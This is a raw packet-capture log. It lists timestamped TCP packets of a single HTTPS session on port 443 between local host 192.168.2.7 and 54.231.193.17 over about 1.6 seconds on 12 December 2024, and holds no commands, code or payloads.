Dec 12, 2024 17:39:35.279557943 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.285733938 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.285784960 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.287045956 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.287045956 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.287058115 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.288814068 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.291649103 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.291673899 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.291721106 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.291728020 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.291781902 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.291795969 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.291800976 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.297997952 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.298026085 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.298110962 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.298110962 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.298120975 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.304347992 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.304363966 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.304404974 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.304414034 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.304441929 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.311182976 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.311216116 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.311247110 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.311255932 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.311451912 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.462060928 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.462090969 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.462131977 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.462145090 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.462179899 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.462775946 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.468280077 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.468307018 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.468342066 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.468348980 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.468379974 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.474334002 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.474365950 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.474472046 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.474473000 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.474479914 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.480509996 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.480551004 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.480642080 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.480642080 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.480648041 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.486689091 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.486730099 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.486779928 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.486785889 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.486809015 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.493604898 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.493643999 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.493673086 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.493675947 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.493683100 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.493730068 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.499455929 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.499484062 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.499553919 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.499560118 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.499588966 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.499607086 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.500200987 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.554380894 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.650875092 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.650907040 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.650960922 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.650984049 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.651005983 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.651026011 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.651510000 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.657742977 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.657764912 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.657862902 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.657862902 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.657875061 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.663940907 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.663971901 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.664047003 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.664047003 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.664062023 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.670641899 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.670674086 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.670794010 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.670794010 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.670815945 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.676085949 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.676136971 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.676147938 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.676162004 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.676183939 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.676201105 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.676408052 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.676457882 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.682667971 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.682687044 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.682728052 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.682735920 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.682773113 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.683151007 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.689038038 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.689068079 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.689110994 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.689117908 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.689161062 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.694987059 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.695014954 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.695069075 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.695075989 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.695110083 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.695411921 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.696991920 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.846555948 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.846620083 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.846656084 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.846682072 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.846695900 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.848848104 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.848859072 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.852511883 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.852550030 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.852590084 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.852601051 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.852657080 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.853435040 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.853543997 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.858792067 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.858820915 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.858886957 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.858896971 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.861007929 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.861021042 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.865025043 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.865056038 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.865096092 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.865104914 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.865139008 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.865699053 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.865734100 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.870989084 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.871016979 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.871069908 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.871077061 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.871110916 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.872067928 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.877866983 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.877891064 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.877944946 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.877953053 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.877984047 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.883637905 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.883667946 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.883799076 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.883799076 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.883830070 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.929394960 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:35.929414988 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:35.976281881 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.035763979 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.035784006 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.035837889 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.035854101 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.035861969 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.035883904 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.035906076 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.035918951 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.036468029 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.041840076 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.041856050 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.041908026 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.041919947 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.041949034 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.048170090 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.048222065 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.048263073 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.048271894 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.048281908 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.054933071 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.054976940 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.055008888 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.055013895 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.055026054 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.055043936 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.055063963 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.061759949 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.061781883 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.061822891 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.061847925 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.061856031 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.061873913 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.067661047 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.067687035 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.067738056 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.067748070 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.067790985 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.072953939 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.072968006 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.073034048 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.073044062 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.073076010 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.079958916 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.080007076 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.080079079 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.080094099 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.080100060 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.080108881 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.080141068 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.231405973 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.231435061 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.231487989 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.231506109 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.231518030 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.231528997 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.231543064 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.237442970 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.237468004 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.237509012 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.237514973 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.237552881 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.243587017 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.243602991 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.243665934 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.243690014 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.249686956 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.249706030 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.249775887 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.249787092 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.255974054 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.255995989 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.256064892 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.256077051 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.262296915 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.262353897 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.262382030 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.262402058 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.262417078 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.268531084 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.268577099 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.268620968 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.268630028 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.268668890 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.274564028 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.274573088 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.274641037 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.420283079 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.420311928 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.420367956 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.420432091 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.420464993 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.420478106 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.426309109 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.426331997 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.426429033 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.426455975 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.432518959 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.432545900 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.432655096 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.432688951 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.432982922 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.438775063 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.438792944 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.438891888 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.438911915 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.441004992 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.441025019 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.444777012 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.444797993 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.444875002 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.444897890 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.451147079 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.451205015 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.451260090 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.451283932 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.451307058 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.457467079 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.457515955 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.457552910 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.457580090 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.457601070 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.457628012 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.457654953 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.463866949 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.463906050 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.464000940 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.464023113 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.464500904 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.464514017 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.507589102 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.615242958 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.615279913 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.615310907 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.615412951 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.615444899 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.615463018 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.621310949 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.621344090 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.621411085 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.621418953 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.621464014 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.622031927 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.622793913 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.627425909 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.627460957 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.627536058 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.627549887 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.627583981 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.628151894 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.633586884 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.633609056 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.633657932 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.633677959 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.633719921 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.634483099 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.634526014 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.640441895 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.640477896 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.640543938 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.640546083 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.640558004 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.640588999 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.646579027 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.646608114 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.646667957 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.646677971 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.646709919 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.652376890 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.652395010 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.652457952 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.652468920 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.652482033 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.695058107 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.695084095 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.741909027 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:36.866375923 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:36.866393089 CET	443	49770	54.231.193.17	192.168.2.7
